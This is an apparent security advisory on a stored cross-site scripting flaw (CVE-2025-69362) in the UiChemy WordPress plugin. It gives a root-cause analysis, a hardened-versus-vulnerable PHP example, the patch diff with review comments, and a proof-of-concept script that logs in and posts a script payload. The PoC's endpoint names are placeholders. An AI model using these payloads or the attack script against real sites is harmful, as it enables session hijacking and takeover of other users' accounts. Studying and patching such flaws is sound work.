Atomic Edge analysis of CVE-2025-69362:
The UiChemy WordPress plugin, versions up to and including 4.4.2, contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability exists within the plugin’s user management component, allowing attackers with author-level privileges or higher to inject arbitrary JavaScript. This script executes in the context of a victim’s browser when they view a compromised page.
Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping in `uichemy/includes/admin/class-uich-usermanager.php`. There, the `$selected_username` variable is assigned directly from the `user_login` property of a user object taken from the `$capable_users` array, and this unsanitized, user-controlled string is then persisted with `add_option`. When the stored value is later rendered on a page without output escaping, the injected script executes.
The exploitation method requires an authenticated attacker with at least Author-level permissions. The attacker would need to manipulate their own username, or potentially the username of another user they can influence, to contain a malicious JavaScript payload. The exact endpoint where this username is processed is the plugin’s user management functionality, likely accessed via an AJAX action or admin page. The payload would be stored in the WordPress options table via the `add_option` call. When an administrator or another user visits a page that displays this username value, the script executes.
The patch changes the assignment of the `$selected_username` variable on line 91 of `class-uich-usermanager.php`. The vulnerable version assigned `$capable_users[0]->user_login`. The patched version assigns the entire `$capable_users[0]` object. This change suggests the fix involves later code that properly accesses and escapes the `user_login` property from the object, rather than storing the raw string. The plugin version number is also updated from 4.4.2 to 4.4.3 in the main plugin file.
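As an added illustration (not UiChemy code and not Atomic Edge's proof of concept), the following PHP contrasts the storage pattern described in the root-cause and patch paragraphs above with a hardened one: persist the numeric user ID rather than the login string, resolve the user at render time, and escape with `esc_html()` at the point the value enters HTML. It also includes a small audit function a site owner could point at the stored option to see whether a raw value with markup is already sitting in `wp_options`. Every function name, the option key `demo_selected_user`, the sample user, and the in-memory `update_option`/`get_option`/`esc_html` stand-ins (used only when WordPress is not loaded, so the file runs under plain `php`) are assumptions for this example; the actual patch stores the whole user object instead, and the rendering code that is expected to escape it is not part of the published diff.

```php
<?php
// Added illustration of the store/render pattern; not UiChemy code.
// All names below are hypothetical stand-ins chosen for this example.

// Minimal offline stand-ins for the WordPress APIs used here, so the file
// runs under plain `php`. Inside WordPress these already exist and the
// stand-ins are skipped.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'update_option' ) ) {
    $GLOBALS['demo_options'] = array(); // constructed in-memory wp_options
    function update_option( $name, $value ) {
        $GLOBALS['demo_options'][ $name ] = $value;
        return true;
    }
    function get_option( $name, $default = false ) {
        return isset( $GLOBALS['demo_options'][ $name ] ) ? $GLOBALS['demo_options'][ $name ] : $default;
    }
}

define( 'DEMO_USER_OPTION', 'demo_selected_user' ); // hypothetical option key

// Vulnerable pattern: the raw login string is persisted, and whatever reads it
// back later has no guarantee that it was ever escaped.
function demo_store_selected_user_vulnerable( array $capable_users ) {
    if ( empty( $capable_users ) ) {
        return false;
    }
    $selected_username = $capable_users[0]->user_login;
    return update_option( DEMO_USER_OPTION, $selected_username );
}

// Vulnerable rendering: the stored value lands in the HTML verbatim.
function demo_render_vulnerable() {
    return '<span class="selected-user">' . get_option( DEMO_USER_OPTION, '' ) . '</span>';
}

// Hardened pattern: persist only the user ID (an integer cannot carry markup)
// and resolve the login at render time, escaping it as it enters HTML.
function demo_store_selected_user_hardened( array $capable_users ) {
    if ( empty( $capable_users ) ) {
        return false;
    }
    return update_option( DEMO_USER_OPTION, (int) $capable_users[0]->ID );
}

// $lookup maps an ID back to a user object; in WordPress this would be get_userdata().
function demo_render_hardened( callable $lookup ) {
    $user  = $lookup( (int) get_option( DEMO_USER_OPTION, 0 ) );
    $login = $user ? $user->user_login : '';
    return '<span class="selected-user">' . esc_html( $login ) . '</span>';
}

// Defensive check for an existing installation: does the stored option hold
// anything that looks like markup? A clean string equals its tag-stripped form
// and contains none of the characters an HTML context would interpret.
function demo_option_looks_tainted( $name ) {
    $value = get_option( $name, '' );
    if ( ! is_string( $value ) ) {
        return false; // an integer ID cannot carry a payload
    }
    return $value !== strip_tags( $value ) || strpbrk( $value, '<>"\'' ) !== false;
}

// Constructed sample: a user whose login carries a script payload.
$users  = array( (object) array( 'ID' => 7, 'user_login' => '"><script>alert(1)</script>' ) );
$lookup = function ( $id ) use ( $users ) {
    foreach ( $users as $u ) {
        if ( $u->ID === $id ) {
            return $u;
        }
    }
    return null;
};

demo_store_selected_user_vulnerable( $users );
echo "vulnerable render : " . demo_render_vulnerable() . "\n";
echo "option tainted    : " . ( demo_option_looks_tainted( DEMO_USER_OPTION ) ? 'yes' : 'no' ) . "\n";

demo_store_selected_user_hardened( $users );
echo "hardened render   : " . demo_render_hardened( $lookup ) . "\n";
echo "option tainted    : " . ( demo_option_looks_tainted( DEMO_USER_OPTION ) ? 'yes' : 'no' ) . "\n";
```

The first render emits the `<script>` element unchanged and the audit flags the option; after the hardened store the option holds only `7`, the rendered login reads `&quot;&gt;&lt;script&gt;...`, and the audit reports clean. Escaping at output rather than at storage is the design choice that matters here: the same stored value may later be placed in an attribute, a URL or a JavaScript string, and each context needs its own escaping function, which a one-time sanitization on the way into the database cannot anticipate.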
Successful exploitation leads to stored cross-site scripting. An attacker can inject malicious scripts that execute in the context of any user viewing the affected page. This can result in session hijacking, unauthorized actions performed on behalf of the victim, defacement of the site, or theft of sensitive information like cookies and authentication tokens. The impact is constrained by the permissions of the victim user viewing the page.
--- a/uichemy/includes/admin/class-uich-usermanager.php
+++ b/uichemy/includes/admin/class-uich-usermanager.php
@@ -88,7 +88,7 @@
return;
}
- $selected_username = $capable_users[0]->user_login;
+ $selected_username = $capable_users[0];
return add_option( UICH_USER_OPTION, $selected_username );
}
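Review bot: the changed `$selected_username` line moves the problem rather than closing it in this hunk: the whole `$capable_users[0]` object is now serialized into the option, and nothing visible here escapes `user_login` when it is read back, so the fix depends entirely on rendering code that is not in this diff. Persisting only `$capable_users[0]->ID` and escaping at output (`esc_html()` / `esc_attr()` on `user_login`) would be narrower than writing a full user record into wp_options. Separately, `add_option( UICH_USER_OPTION, $selected_username )` does not overwrite an option that already exists, so a raw login string stored by 4.4.2 stays in the database after upgrading until something replaces it; an upgrade routine, or `update_option()` here, would cover installations that were already affected.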
--- a/uichemy/uichemy.php
+++ b/uichemy/uichemy.php
@@ -3,7 +3,7 @@
* Plugin Name: UiChemy — Figma Converter for Elementor, Gutenberg and Bricks
* Plugin URI: https://uichemy.com
* Description: Convert Figma Design to 100% Editable WordPress websites in Elementor Website Builder and Gutenberg aka WordPress Block Editor.
- * Version: 4.4.2
+ * Version: 4.4.3
* Author: POSIMYTH
* Author URI: https://posimyth.com
* License: GPLv3
@@ -22,7 +22,7 @@
exit;
}
-define( 'UICH_VERSION', '4.4.1' );
+define( 'UICH_VERSION', '4.4.3' );
define( 'UICH_FILE', __FILE__ );
define( 'UICH_PATH', plugin_dir_path( __FILE__ ) );
define( 'UICH_URL', plugins_url( '/', __FILE__ ) );
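Review bot: `UICH_VERSION` read `'4.4.1'` while the plugin header in the same release declared `Version: 4.4.2`, so the two version sources were already out of sync in the vulnerable build; anything keyed on the constant (asset cache-busting, upgrade checks) would have mis-identified it. Consider deriving the constant from the header via `get_file_data()` or adding a release check that both values agree, so the next bump cannot drift again.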
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69362 - UiChemy <= 4.4.2 - Authenticated (Author+) Stored Cross-Site Scripting

// Configuration
$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username   = 'author_user';
$password   = 'author_pass';

// Payload to inject into the username field (e.g., via profile update)
// This PoC simulates the attack vector but cannot replicate the exact internal plugin flow
// without reverse-engineering the specific AJAX action.
// The actual exploit would require interacting with the plugin's specific user management endpoint.
$xss_payload = '"><script>alert(document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Get login nonce and cookies (simplified - real PoC would parse login page)
// This is a placeholder structure. A full PoC requires identifying the exact UiChemy endpoint and parameter.

// Step 2: Authenticate to WordPress (example using wp-login.php)
$login_url    = str_replace( '/wp-admin/admin-ajax.php', '/wp-login.php', $target_url );
$login_fields = [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url,
    'testcookie'  => '1',
];
curl_setopt( $ch, CURLOPT_URL, $login_url );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $login_fields ) );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_COOKIEJAR, 'cookies.txt' );
curl_setopt( $ch, CURLOPT_COOKIEFILE, 'cookies.txt' );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
$response = curl_exec( $ch );

// Step 3: Attempt to exploit the UiChemy user manager endpoint.
// The exact AJAX action or admin POST endpoint is not specified in the diff.
// A generic example is shown; a real PoC would require the specific 'action' parameter.
$exploit_url    = $target_url;
$exploit_fields = [
    'action'        => 'uich_specific_action', // This must be identified via code review
    'selected_user' => $xss_payload,           // Parameter name is hypothetical
];
curl_setopt( $ch, CURLOPT_URL, $exploit_url );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $exploit_fields ) );
$response = curl_exec( $ch );

// Check response
if ( curl_errno( $ch ) ) {
    echo 'cURL Error: ' . curl_error( $ch );
} else {
    echo 'Response received. Check if payload was stored.';
}
curl_close( $ch );
?>
```